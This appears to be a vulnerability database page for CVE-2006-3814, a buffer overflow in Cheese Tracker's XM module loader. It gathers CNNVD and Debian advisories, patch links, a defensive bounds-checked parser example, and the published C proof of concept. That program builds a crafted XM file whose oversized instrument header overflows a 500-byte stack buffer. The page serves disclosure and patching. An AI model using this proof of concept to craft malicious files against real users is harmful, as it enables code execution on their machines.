CVE-2006-3814
CVSS 5.1
Published: 2006-07-25 09:22:00
Revised: 2017-07-19 21:32:37

[Original] Buffer overflow in the Loader_XM::load_instrument_internal function in loader_xm.cpp for Cheese Tracker 0.9.9 and earlier allows user-assisted attackers to execute arbitrary code via a crafted file with a large amount of extra data.


[CNNVD] Cheese Tracker 'loader_xm.cpp' XM Loader Buffer Overflow Vulnerability (CNNVD-200607-440)

The Loader_XM::load_instrument_internal function in loader_xm.cpp in Cheese Tracker 0.9.9 and earlier contains a buffer overflow. A user-assisted attacker can execute arbitrary code via a crafted file carrying a large amount of extra data.

- CVSS (base score)

CVSS score: 5.1 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3814
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3814
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-440
(Official data source) CNNVD

- Other links and resources

http://aluigi.altervista.org/adv/cheesebof-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/cheesebof-adv.txt
http://securityreason.com/securityalert/1291
(UNKNOWN)  SREASON  1291
http://www.debian.org/security/2006/dsa-1166
(UNKNOWN)  DEBIAN  DSA-1166
http://www.gentoo.org/security/en/glsa/glsa-200610-13.xml
(UNKNOWN)  GENTOO  GLSA-200610-13
http://www.securityfocus.com/archive/1/archive/1/440962/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060723 Buffer-overflow in the XM loader of Cheese Tracker 0.9.9
http://www.securityfocus.com/bid/19115
(UNKNOWN)  BID  19115
https://exchange.xforce.ibmcloud.com/vulnerabilities/27957
(UNKNOWN)  XF  cheesetronic-loaderxm-bo(27957)

- Vulnerability information

Cheese Tracker 'loader_xm.cpp' XM Loader Buffer Overflow Vulnerability
Medium severity  Buffer overflow
2006-07-25 00:00:00 2006-08-07 00:00:00
Remote
The Loader_XM::load_instrument_internal function in loader_xm.cpp in Cheese Tracker 0.9.9 and earlier contains a buffer overflow. A user-assisted attacker can execute arbitrary code via a crafted file carrying a large amount of extra data.

- Advisories and patches

The vendor has released an upgrade to fix this security issue; patch download links:
Cheese Tracker Cheese Tracker 0.9.9
Debian cheesetracker_0.9.9-1sarge1_alpha.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_alpha.deb
Debian cheesetracker_0.9.9-1sarge1_amd64.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_amd64.deb
Debian cheesetracker_0.9.9-1sarge1_arm.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_arm.deb
Debian cheesetracker_0.9.9-1sarge1_hppa.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_hppa.deb
Debian cheesetracker_0.9.9-1sarge1_i386.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_i386.deb
Debian cheesetracker_0.9.9-1sarge1_ia64.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_ia64.deb
Debian cheesetracker_0.9.9-1sarge1_m68k.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_m68k.deb
Debian cheesetracker_0.9.9-1sarge1_mips.deb
Debian 3.1 (stable)
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_mips.deb
Debian cheesetracker_0.9.9-1sarge1_mipsel.deb
Debian 3.1 (stable)
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_mipsel.deb
Debian cheesetracker_0.9.9-1sarge1_powerpc.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_powerpc.deb
Debian cheesetracker_0.9.9-1sarge1_s390.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_s390.deb
Debian cheesetracker_0.9.9-1sarge1_sparc.deb
Debian GNU/Linux 3.1 alias sarge
http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_sparc.deb

- Vulnerability information (2065)

Cheese Tracker <= 0.9.9 Local Buffer Overflow Exploit PoC (EDBID:2065)
windows local
2006-07-23 Verified
0 Luigi Auriemma
N/A
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>



#define VER         "0.1"
#define CPOS        243                 // reader.get_file_pos()-p_cpos
#define JUNKSZ      (500 + CPOS)        // Uint8 junkbuster[500]
#define OVERFLOW    740                 // overflow
#define BOFSZNUM    (JUNKSZ + OVERFLOW)
#define BOFSZ       ((JUNKSZ + OVERFLOW) - CPOS)



#define myzero(x)   memset(x, 0, sizeof(x));
void put_bytes(FILE *fd, int chr, int size);
void std_err(void);



#pragma pack(1)

struct header {
    uint8_t     id_text[17];
    uint8_t     mod_name[20];
    uint8_t     boh;
    uint8_t     tracker[20];
    uint16_t    ver;
    uint32_t    head_size;
    uint16_t    song_len;
    uint16_t    restart_pos;
    uint16_t    channels;
    uint16_t    patterns;
    uint16_t    instr;
    uint16_t    flags;
    uint16_t    tempo;
    uint16_t    bpm;
    uint8_t     patt_table[256];
} header;

struct patterns {
    uint32_t    length;
    uint8_t     type;
    uint16_t    rows;
    uint16_t    packed_size;
} patterns;

struct instruments {
    uint32_t    size;
    uint8_t     name[22];
    uint8_t     type;
    uint16_t    samples;
    uint32_t    Sample_header_size;
} instruments;

struct envelope {
    uint8_t     Sample_number_for_all_notes[96];
    uint16_t    Points_for_volume_envelope[24];
    uint16_t    Points_for_panning_envelope[24];
    uint8_t     Number_of_volume_points;
    uint8_t     Number_of_panning_points;
    uint8_t     Volume_sustain_point;
    uint8_t     Volume_loop_start_point;
    uint8_t     Volume_loop_end_point;
    uint8_t     Panning_sustain_point;
    uint8_t     Panning_loop_start_point;
    uint8_t     Panning_loop_end_point;
    uint8_t     Volume_type;
    uint8_t     Panning_type;
    uint8_t     Vibrato_type;
    uint8_t     Vibrato_sweep;
    uint8_t     Vibrato_depth;
    uint8_t     Vibrato_rate;
    uint16_t    Volume_fadeout;
    uint16_t    Reserved;   // uint8_t    Reserved[11]; (do not use here)
} envelope;

struct sample {
    uint32_t    length;
    uint32_t    loop_start;
    uint32_t    loop_length;
    uint8_t     volume;
    uint8_t     finetune;
    uint8_t     type;
    uint8_t     panning;
    int8_t      relative_note;
    uint8_t     reserved;
    uint8_t     name[22];
} sample;

#pragma pack()



int main(int argc, char *argv[]) {
    FILE    *fd;
    int     i,
            j;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
        "Cheese Tracker <= 0.9.9 possible code execution "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <output_file.XM>\n"
            "\n", argv[0]);
        exit(1);
    }

    fname = argv[1];

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

        /* header */
    printf("- build header\n");

    strncpy(header.id_text,   "id_text",  sizeof(header.id_text));
    strncpy(header.mod_name,  "mod_name", sizeof(header.mod_name));
    header.boh                = 26;
    strncpy(header.tracker,   "tracker",  sizeof(header.tracker));
    header.ver                = 4 | (1 << 8);
    header.head_size          = 276;
    header.song_len           = 0;
    header.restart_pos        = 0;
    header.channels           = 0;
    header.patterns           = 0;
    header.instr              = 1;
    header.flags              = 1;
    header.tempo              = 6;
    header.bpm                = 130;
    myzero(header.patt_table);

    fwrite(&header, sizeof(header), 1, fd);

        /* patterns */

    for(i = 0; i < header.patterns; i++) {
        printf("- build pattern\n");

        patterns.length      = 9,
        patterns.type        = 0;
        patterns.rows        = 64,
        patterns.packed_size = 0;

        fwrite(&patterns, sizeof(patterns), 1, fd);

        put_bytes(fd, patterns.packed_size, 0xff);  // packed!
    }

        /* instruments */
    printf("- build instruments\n");

    for(i = 0; i < header.instr; i++) {
        instruments.size               = BOFSZNUM;
        strncpy(instruments.name,      "instrument_name", sizeof(instruments.name));
        instruments.type               = 0;
        instruments.samples            = 1;
        instruments.Sample_header_size = 40;

        fwrite(&instruments, sizeof(instruments), 1, fd);

        for(j = 0; j < instruments.samples; j++) {

                /* envelope */
            printf("- build envelope\n");

            myzero(envelope.Sample_number_for_all_notes);
            myzero(envelope.Points_for_volume_envelope);
            myzero(envelope.Points_for_panning_envelope);
            envelope.Number_of_volume_points  = 0;
            envelope.Number_of_panning_points = 0;
            envelope.Volume_sustain_point     = 0;
            envelope.Volume_loop_start_point  = 0;
            envelope.Volume_loop_end_point    = 0;
            envelope.Panning_sustain_point    = 0;
            envelope.Panning_loop_start_point = 0;
            envelope.Panning_loop_end_point   = 0;
            envelope.Volume_type              = 0;
            envelope.Panning_type             = 0;
            envelope.Vibrato_type             = 0;
            envelope.Vibrato_sweep            = 0;
            envelope.Vibrato_depth            = 0;
            envelope.Vibrato_rate             = 0;
            envelope.Volume_fadeout           = 128;
            envelope.Reserved                 = 0;

            fwrite(&envelope, sizeof(envelope), 1, fd);

            printf("- %d bytes will be copied in the junkbuster[500] buffer\n", BOFSZ);
            put_bytes(fd, BOFSZ, 'a');
        }
    }

    fclose(fd);
    printf("- finished\n");
    return(0);
}



void put_bytes(FILE *fd, int size, int chr) {
    while(size--) fputc(chr, fd);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}

// milw0rm.com [2006-07-23]

- Vulnerability information (F49732)

Debian Linux Security Advisory 1166-1 (PacketStormID:F49732)
2006-09-07 00:00:00
Debian  debian.org
advisory,overflow,arbitrary
linux,debian
CVE-2006-3814

Debian Security Advisory 1166-1 - Luigi Auriemma discovered a buffer overflow in the loading component of cheesetracker, a sound module tracking program, which could allow a maliciously constructed input file to execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1166-1                    security@debian.org
http://www.debian.org/security/                                 Steve Kemp
September 3rd, 2006                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : cheesetracker 
Vulnerability  : buffer overflow
Problem-Type   : local
Debian-specific: no
CVE ID         : CVE-2006-3814
BugTraq ID     : 20060723
Debian Bug     : 380364

Luigi Auriemma discovered a buffer overflow in the loading component
of cheesetracker, a sound module tracking program, which could allow a
maliciously constructed input file to execute arbitrary code.

For the stable distribution (sarge) this problem has been fixed in
version 0.9.9-1sarge1.

For the unstable distribution (sid) this problem has been fixed in
version 0.9.9-6.

We recommend that you upgrade your cheesetracker package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1.dsc
      Size/MD5 checksum:      659 94fe4cfb651e3fd373a79d8928b7c24c
    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1.diff.gz
      Size/MD5 checksum:    14286 c3e831161af73cb234e5ccee329e90ae
    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9.orig.tar.gz
      Size/MD5 checksum:   842246 d2cb55cd35eaaaef48454a5aad41a08d

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_alpha.deb
      Size/MD5 checksum:  1138458 aa9cab8b149d4824c4f19ef8f89f2200

  AMD64 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_amd64.deb
      Size/MD5 checksum:   929228 67b42bf5ca9b7b7c230bb21a5ec3942d

  ARM architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_arm.deb
      Size/MD5 checksum:  1159110 04e55102d781a572aa1e091a75c7c615

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_hppa.deb
      Size/MD5 checksum:  1248130 547aa7324369bb2572d28558a418bd6f

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_i386.deb
      Size/MD5 checksum:   904204 286d04ae0c9893c894b67d2336e9aae9

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_ia64.deb
      Size/MD5 checksum:  1292230 d6e5e7d89f45509cccb1a51498629bdf

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_m68k.deb
      Size/MD5 checksum:   977470 6287cf1f532affc53921547dd9b9a6a4

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_powerpc.deb
      Size/MD5 checksum:   968684 839f5a35fe36eb2f12627d5b9e6bbd8b

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_s390.deb
      Size/MD5 checksum:   871530 9b6f802a60f568a537d7f6e40f15e4da

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/cheesetracker/cheesetracker_0.9.9-1sarge1_sparc.deb
      Size/MD5 checksum:   975272 c0cc12c0095961806788d1871acbbf54

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFE+ssowM/Gs81MDZ0RAu/EAJ44jroCmofByWjRsIWvZvD64hofSgCglyET
egUPEuZnuJ9jAtrdAIikfhE=
=xuCl
-----END PGP SIGNATURE-----

- Vulnerability information

28466
Cheese Tracker loader_xm.cpp Loader_XM::load_instrument_internal Function Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-07-23 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Credit

Unknown or Incomplete

- Vulnerability information

Cheese Tracker XM Loader Buffer Overflow Vulnerability
Boundary Condition Error 19115
Yes No
2006-07-23 12:00:00 2006-12-22 12:03:00
Luigi Auriemma discovered this issue.

- Affected software versions

Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Cheese Tracker Cheese Tracker 0.9.9

- Vulnerability discussion

Cheese Tracker is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input data before copying it to an insufficiently sized memory buffer.

An attacker may cause malicious code to execute by supplying a malicious XM file. This may facilitate unauthorized remote access with the privileges of the user running the vulnerable application.
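The bounds check the discussion above says the loader lacks, and that the PoC's CPOS / junkbuster[500] comments point at, as an added example written for this page (it is not Cheese Tracker's loader_xm.cpp and not part of the PoC or the advisories above): a reader for one XM instrument header, laid out as in the PoC's struct definitions, that validates the header's declared size against the 243 bytes already consumed and against the remaining file length, then skips any extra bytes by advancing a cursor rather than copying them into a fixed 500-byte stack buffer. All type and function names (xm_reader, xm_read_instrument_header, xm_build_test_header, xm_probe) are this example's own, and the header bytes it parses are constructed in the program, not taken from a real module.

```c
/* Added example, not Cheese Tracker's code and not the PoC above: a
 * bounds-checked reader for an XM instrument header. Field offsets follow
 * the XM layout used by the PoC's struct definitions. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Bytes the loader consumes from the instrument header: 29 for the base
 * fields (size, name[22], type, samples); with samples > 0 also the 4-byte
 * sample-header-size and the 210-byte envelope block, 243 in total, which
 * is the CPOS value in the PoC. */
#define XM_INSTR_BASE_SIZE    29u
#define XM_INSTR_FULL_SIZE    243u
#define XM_JUNKBUSTER_SIZE    500u   /* size of the original fixed buffer */

enum xm_status { XM_OK = 0, XM_ERR_TRUNCATED = 1, XM_ERR_BAD_SIZE = 2 };

struct xm_reader { const uint8_t *data; size_t len; size_t pos; };

struct xm_instr_info {
    uint32_t declared_size;   /* "size" field at the start of the header */
    uint16_t samples;
    uint32_t extra_skipped;   /* bytes beyond the known fields, skipped */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parse one instrument header at r->pos. On XM_OK, r->pos is left at the
 * first byte after the header, i.e. where the sample headers begin. */
enum xm_status xm_read_instrument_header(struct xm_reader *r, struct xm_instr_info *out)
{
    size_t start = r->pos;
    memset(out, 0, sizeof(*out));

    if (r->len < start || r->len - start < XM_INSTR_BASE_SIZE)
        return XM_ERR_TRUNCATED;
    out->declared_size = rd32(r->data + start);
    out->samples       = rd16(r->data + start + 27);   /* after size+name+type */

    size_t consumed = XM_INSTR_BASE_SIZE;
    if (out->samples > 0) {
        consumed = XM_INSTR_FULL_SIZE;
        if (r->len - start < consumed)
            return XM_ERR_TRUNCATED;
    }

    /* The original defect: declared_size - consumed bytes were read into a
     * 500-byte stack buffer without comparing the count against its size.
     * Reject a size smaller than what was already consumed (the subtraction
     * would wrap) and a size that runs past the end of the data. */
    if (out->declared_size < consumed)
        return XM_ERR_BAD_SIZE;
    uint32_t extra = out->declared_size - (uint32_t)consumed;
    if (extra > r->len - (start + consumed))
        return XM_ERR_TRUNCATED;

    /* Skip by advancing the cursor: nothing is copied, so there is no
     * destination buffer to overflow, whatever the declared size. */
    r->pos = start + consumed + extra;
    out->extra_skipped = extra;
    return XM_OK;
}

/* Build a constructed (not real) instrument header with one sample, the
 * given size field and `trailing` filler bytes after the known fields. */
size_t xm_build_test_header(uint8_t *buf, size_t cap, uint32_t declared_size, size_t trailing)
{
    size_t need = XM_INSTR_FULL_SIZE + trailing;
    if (cap < need) return 0;
    memset(buf, 0, need);
    buf[0] = (uint8_t)declared_size;
    buf[1] = (uint8_t)(declared_size >> 8);
    buf[2] = (uint8_t)(declared_size >> 16);
    buf[3] = (uint8_t)(declared_size >> 24);
    memcpy(buf + 4, "instrument_name", 15);
    buf[27] = 1;    /* samples = 1 (little-endian uint16) */
    buf[29] = 40;   /* sample header size, as in the PoC */
    memset(buf + XM_INSTR_FULL_SIZE, 'a', trailing);
    return need;
}

/* Returns the number of extra bytes skipped on success, or the negated
 * xm_status on failure. */
long xm_probe(uint32_t declared_size, size_t trailing)
{
    uint8_t buf[4096];
    struct xm_reader r;
    struct xm_instr_info info;
    r.data = buf;
    r.len  = xm_build_test_header(buf, sizeof buf, declared_size, trailing);
    r.pos  = 0;
    enum xm_status st = xm_read_instrument_header(&r, &info);
    return st == XM_OK ? (long)info.extra_skipped : -(long)st;
}

int main(void)
{
    /* 1483 = JUNKSZ + OVERFLOW in the PoC: 1240 extra bytes, more than the
     * original junkbuster[500] holds. The checked reader just skips them. */
    long extra = xm_probe(1483, 1240);
    printf("declared 1483: extra bytes skipped = %ld%s\n", extra,
           extra > (long)XM_JUNKBUSTER_SIZE ? " (exceeds junkbuster[500])" : "");
    printf("declared 243:  %ld\n", xm_probe(243, 0));
    printf("declared 100:  %ld (bad size)\n", xm_probe(100, 0));
    printf("declared 1483, 10 trailing bytes: %ld (truncated)\n", xm_probe(1483, 10));
    return 0;
}
```

Compiled with any C99 compiler, the program reports that the PoC's declared size of 1483 leaves 1240 extra bytes, more than junkbuster[500] holds, which the checked reader skips without copying; a declared size below the 243 consumed bytes (which would wrap the subtraction into a huge count) and a size that extends past the end of the data are both rejected before any read.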

- Exploit

Exploit code is available.

- Solution

Please see the references for more information and vendor advisories.


Cheese Tracker Cheese Tracker 0.9.9

- References